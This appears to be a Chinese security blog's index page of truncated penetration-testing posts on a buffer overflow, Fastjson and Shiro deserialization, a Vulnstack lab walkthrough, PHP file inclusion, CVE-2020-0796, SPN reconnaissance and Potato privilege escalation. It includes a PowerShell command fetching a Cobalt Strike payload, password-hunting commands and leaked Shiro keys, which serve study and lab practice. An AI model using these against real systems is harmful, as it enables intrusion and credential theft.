Zeo's Blog

0x00 简介本次主要记录缓冲器溢出的：原理、实现和shellcode的编写 详细的去理解原理，和底层开始写shellcode 本次实验的C代码 123456789101112131415161718192021222324252627282930313233#include <stdio.h>#include <windows.h>#define PASSWORD "1234567"int verify_password (char *password){ int authenticated; char buffer[44]; authenticated=strcmp(password,PASSWORD); strcpy(buffer,password);//over flowed here! return authenticated;} main(){ int valid_flag=0; char password[1024]; FILE * fp; LoadLibrary("user32.d ...

0x01漏洞介绍Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。 0x02影响范围Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现下面以Fastjson 1.2.47 为例子，因为vulhub有现成的环境十分方便 12P牛我用vulhub中的 1.2.47的docker 想测试doslog检查 fastjson 但是总是收到不到dnslog 但是正常的exp反弹shell就是可以我很疑惑 我的用法正确吗，用的这个{"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"} 下面是流程示意图 主机A：存在fastjson反序列化漏 ...

前言这是老以前做的一个，主要熟悉一下cs4的新特性，还是发出来看看吧，流程简单一些，但是内网流程还是比较完整的。大家可以看看 本次靶机为红日安全的ATT&CK第五个靶场。 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 思路参考 记一次在Vulnstack ATT&CK 5 靶场中使用CobaltStrike的渗透之旅 文章中如有错误的地方望大佬指正。 菜鸡文章望大佬勿喷。 0x00信息收集Namp 扫一下 发现 80 3306 访问一下发现thinkphp5 记得是有rce的 searchsploit thinkphp 有货 0x00入口权限获取 cool可以用 上传的姿势太多了，我就使用一个最简单的 使用powershell 下载 CS payload 12345powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','C:\phpstudy_pro\WWW\a.p ...

进制的定义二进制：由两个符号组成，分别是0 、1 八进制：由八个符号组成，分别是0、1、2、3、4、5、6、7 十进制：由十个符号组成，分别是0、1、2、3、4、5、6、7、8、9 十六进制：由十六个符号组成，分别是0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F 度量单位:1byte 字节 = 8 bit 比特 char WORD = 2 BYTE = 16 bit short int DWORD = 4 BYTE = 32 bit QWORD = 8 BYTE = 64 bit 1kb = 1024 byte = 8192 bit 1mb = 1024 kb 1gb = 1024 mb 1tb = 1024 gb 有符号 无符号 byte -128-127 0-255 word -32768-32767 0-65535 DWORD qword 16位汇编：实模式，16位处理器内的内部，最多可以处理存储的长度为 ...

Linux 内网本机信息收集速查 系统类型12cat /etc/issue查看系统名称 网络信息收集123456last 多数运维会接入内网登录系统，这时候，便可获取部分内网ip 进而对内网IP段进行画像Route -n 内网路由情况，也能为内网网络拓扑提供一定的信息IPtables 防火墙情况，有时候会存在内网网络通行规则，也能提供一定信息历史命令！/root/.bash_history 直接命令搜敏感文件收集1234grep "password:" * -Rnfind / -name "config.*"find / -name "databases.*"find / -name "config.*" | xargs grep "password"" 常用敏感文件12345 ...

0x00 起因被问到了php的一伪协议 后发现自己对伪协议的认识还是太浅， 现在好好总结学习一番 又感觉自己学了半天不知道自己在干嘛。。。哎。。。 0x01 环境PHP版本：5.4.45 PHP.ini： allow_url_fopen ：on 默认开启 allow_url_include：om 默认关闭 PHP版本<=5.2 可以使用%00进行截断，但是少有低版本的了。。。 先站在前人的大肩膀看看总结 ，主要是两个选项的开关，实验我默认都开了 freebuff上看到的 0x02 具体的协议我的实验代码cmd.php 123<?phpinclude($_GET['file'])?> php:// 访问输入输出流其中主要有两个协议： php://filter 简介PHP 过滤器用于对来自非安全来源的数据（比如用户输入）进行验证和过滤。 在文件包含中常用到这个协议（因为文件包含的特性，只有包含php标签就会解析，就算是PHP后缀但是里面没有PHP标签也不会解析） 所以如果想要读取运行php文件的 ...

0x00漏洞介绍漏洞介绍 微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796 影响范围：Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation) 0x01复现坑点：坑点比较多看一下EXP地址： https://github.com/chompie133 ...

Apache Shiro RememberMe 反序列化（Shiro550）Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。 影响组件Apache Shiro <= 1.2.4 实际漏洞影响范围如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞，无论Shiro是什么版本。 目前网上收集到的密钥123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111kPH+bIxk5D2deZiIxcaaaA==wGiHplamyXlVB11UXWol8g==2AvVhdsgUs0FSA3SDFAdag==4AvVhm ...

0x01 SPNSPN（ServicePrincipal Names)服务主体名称，是服务实例(比如：HTTP、SMB、MySQL等服务)的唯一标识符。 SPN是服务器上所运行服务的唯一标识，每个使用Kerberos的服务都需要一个SPN Kerberos认证过程使用SPN将服务实例与服务登录账户相关联，如果想使用 Kerberos 协议来认证服务，那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例，则每个实例都必须具有自己的 SPN SPN分为两种，一种注册在AD上机器帐户(Computers)下，另一种注册在域用户帐户(Users)下 当一个服务的权限为Local System或Network Service，则SPN注册在机器帐户(Computers)下 当一个服务的权限为一个域用户，则SPN注册在域用户帐户(Users)下 0x02 SPN发现由于每台服务器都需要注册用于Kerberos身份验证服务的SPN 所以这是一个更加隐蔽的方法来收集有关内网域环境的信息 查询SPN服务，内网探测对域控制器发起LDAP查询，这是正常kerberos票据行为的一部分， ...

0x00 Potato（烂土豆）提权的原理：所谓的烂土豆提权就是俗称的MS16-075 可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。 一、简单的原理：攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证，则他可以将该身份验证尝试中继到另一台计算机！ Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继将不再起作用。但是，跨协议攻击（例如HTTP-> SMB）仍然可以正常使用！ 二、我的理解流程：1、所以我们控制HTTP流量大概都流经我们控制的HTTP服务器，做中介人攻击。 2、可以诱导系统高权用户执行一些操作，例如将它们重定向到需要NTLM身份验证的地方。所有NTLM凭据都将中继到本地SMB侦听器，以创建运行用户定义的命令的新系统服务，例如是Windows Update服务的请求时，就会是一个高权令牌，劫持掉这个令牌 3、最后模仿这个高权令牌。只有具有“模仿安全令牌权限”的 ...